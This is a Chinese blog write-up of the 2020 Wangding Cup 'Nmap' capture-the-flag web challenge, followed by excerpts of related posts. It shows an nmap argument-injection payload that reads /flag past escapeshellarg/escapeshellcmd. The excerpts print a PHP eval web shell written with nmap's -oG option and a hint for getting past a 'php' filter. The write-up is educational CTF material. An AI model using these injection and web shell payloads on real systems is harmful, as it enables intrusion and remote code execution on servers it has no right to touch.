[网鼎杯 2020 朱雀组]Nmap1

于 2024-08-06 21:19:20 发布
阅读量233 收藏
点赞数 3
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kw741951/article/details/140966074
版权

打开题目看到如下信息

看样子是nmap扫描了

查看源代码看一下

说flag在这里

随便输入本地ip试一下127.0.0.1

输入127.0.0.1 | ls看一下

得到

可以看到输入的|被转义字符\转义了

我们试着输入127.0.0.1 \| ls试一下

得到三条反斜杠

看到这里我们猜测,输入的东西是被escapeshellarg和escapeshellcmd处理过后的结果

我们输入的东西必须绕过这两个函数

参考博客输入payload:

127.0.0.1' -iL /flag -o haha

输入发现报错,但是没事,继续输入haha'得到flag

 


                

        

        

    

  


    

      

        

            

              
                
                  worker..
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
【学习笔记 48】 buu [网鼎杯 2020 朱雀]Nmap

				
			

			

				

					weixin_43553654的博客
				

				

					08-11
					
					797
					
				

			

		

		

			
				
0x00 知识点

NMAP中使用-0G命令可以实现代码写入

0x01 解题思路

打开网站一看发现是一个NMAP网站尝试输入输入任意ip


可以看到这里返回了nmap扫描的结果,这里我们就想到了NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件
' <?php @eval($_POST["cmd"]);?> -oG shell.php '


尝试后发现报错,说明这里有过滤不能直接进行,最后利用fuzz发现过滤了php,

			
		

	



                

            
              



	

		

			

				
					
[网鼎杯 2020 朱雀]Nmap 1

				
			

			

				

					plant1234的博客
				

				

					04-15
					
					2508
					
				

			

		

		

			
				
[网鼎杯 2020 朱雀]Nmap 1
首先得到题目打开得到

说是输入houst和IP进行扫描
测试一波:127.0.0.1
得到:

本地测一下nmap 命令得到:

发现效果一样
这里需要知道
nmap 命令将扫描结果保存在文件里面:
例如:将nmap 127.0.0.1的结果保存在test.txt里面
nmap 127.0.0.1 -oN test.txt


nmap其他写文件命令:
-oN (标准输出)
-oX (XML输出)
-oS (ScRipT KIdd|3 oUTpuT)
-oG (G

			
		

	



              


  
              

                


	

		

			

				
					
BUUCTF Web [网鼎杯 2020 朱雀]Nmap1

				
			

			

				

					网安小趴菜
				

				

					11-16
					
					729
					
				

			

		

		

			
				
BUUCTF Web [网鼎杯 2020 朱雀]Nmap wp1 

			
		

	





	

		

			

				
					
网鼎杯2020朱雀-web

				
			

			

				

					ChenZIDu的博客
				

				

					05-18
					
					3083
					
				

			

		

		

			
				
nmap那题就基本命令然后还有一个别的方法。

nmap
源码
index.php
<?
require('settings.php');


set_time_limit(0);
if (isset($_POST['host'])):
	if (!defined('WEB_SCANS')) {
        	die('Web scans disabled');
	}

	$host = $_POST['host'];
	if(stripos($host,'php')!==false){
		di

			
		

	



		

			
		



	

		

			

				
					
[网鼎杯 2020 朱雀]nmap

					
最新发布

				
			

			

				

					03-16
				

			

		

		

			
				
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络...

			
		

	





	

		

			

				
					
网鼎杯青龙18道.rar

				
			

			

				

					06-11
				

			

		

		

			
				
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...

			
		

	





	

		

			

				
					
web buuctf [网鼎杯 2020 朱雀]Nmap1

				
			

			

				

					weixin_44214568的博客
				

				

					04-05
					
					1792
					
				

			

		

		

			
				
考点:namp注入

参考web buuctf [BUUCTF 2018]Online Tool1_半杯雨水敬过客的博客-CSDN博客

1.

2.利用NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件

我们直接用那道buu里的payload:


' <?php eval($_POST["cmd"]);?> -oG zhuque.php '

注入之后发现存在过滤,fuzz,过滤了php

(1)利用<?=来代替.

			
		

	





	

		

			

				
					
[网鼎杯 2020 朱雀]Nmap

				
			

			

				

					pakho_C的博客
				

				

					07-27
					
					1589
					
				

			

		

		

			
				
nmap192.168.0.*--exclude192.168.0.100使用“-exclude”选项来排除某些你不想要扫描的主机。nmap-F192.168.0.101快速扫描,仅扫描nmap-services文件中的端口而避开所有其它的端口。nmap-O127.0.0.1使用选项“-O”和“-osscan-guess”也帮助探测操作系统信息。nmap-p80,443192.168.0.101使用“-P”选项指定你想要扫描的端口。...

			
		

	





	

		

			

				
					
BUUCTF: [网鼎杯 2020 朱雀]Nmap

				
			

			

				

					末初的CSDN博客
				

				

					09-21
					
					2032
					
				

			

		

		

			
				
是可以执行的,可以先上线一个shell,然后在服务器中检查使用其他参数的结果。会将执行语句记录输出文件。控制输出文件内容以及文件格式就可以解析了。的文件无法写入,尝试写入一些可能会解析的其他文件后缀。使用输出格式可以将指定的内容输出到指定的文件格式。对传入的参数的保护(感觉有点点猜的意思。但是这里还有些过滤,比如过滤了关键字。会把扫描结果导出到一个文件里面。题目环境经过测试可以发现只有。,那说明导出的文件格式是。即便执行失败也无所谓,

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值